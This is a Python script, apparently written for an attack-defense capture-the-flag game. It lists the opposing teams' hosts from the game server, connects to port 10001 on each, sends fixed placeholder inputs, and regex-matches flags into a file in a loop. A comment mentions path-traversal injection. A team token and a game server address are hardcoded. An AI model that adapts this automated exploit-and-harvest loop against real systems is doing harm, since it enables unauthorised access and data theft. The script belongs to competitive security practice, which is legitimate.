#!/usr/bin/python3
from swpag_client import *
from pwn import *
import re
class ProjectCTFAPI():
    __slots__ = ('team')
    def __init__(self, gameIp, teamToken):
        self.team = Team(gameIp, teamToken)
    def getserviceid(self):
        serviceid = self.team.get_service_list()[0]['service_id']
        return serviceid
    def getTargets(self,service):
        targets = self.team.get_targets(service)
        for t in targets:
            for key in ['hostname','port','flag_id', 'team_name']:
                print("%10s : %s" % (key, t[key]))
            print("\n")
        return targets
    def getFLG(self, hostname, flagID):
        tflag=remote(hostname, 10001)
        # this area try to find voln and inject some code such as cat ../../../append to show FLG
        tflag.sendline('someid')
        tflag.sendline('totallyrandomtoken')
        tflag.sendline('123')
        tflag.sendline('R')
        # after that matching FLG scheme to find right FLG
        tflag_result=tflag.recvall(timeout=1)
        a = str(tflag_result, encoding="utf-8")
        print (type(a))
        tflag_search = re.search('FLG[0-9A-Za-z]{13}', a)
        if tflag_search==None:
            tflag.close()
            return None
        FLG=tflag_search.group(0)
        print (FLG)
        tflag.close()
        return FLG
if __name__ == '__main__':
    teamToken = "NNqItWkR0IMiVezUVgUk"
    teaminterface = 'http://52.37.204.0/'
    api = ProjectCTFAPI(teaminterface, teamToken)
    serviceIds = api.getserviceid()
    while True:
        targets = api.getTargets(serviceIds)
        for t in targets:
            if t['port']==10001:
                FLG=api.getFLG(t['hostname'], t['flag_id'])
                if FLG != None:
                    try:
                        #api.submitFlag(FLG)
                        flagtxt = open('1.txt',mode='a+')
                        flagtxt.write(FLG)
                    except RuntimeError:
                        continue
    time.sleep(180)

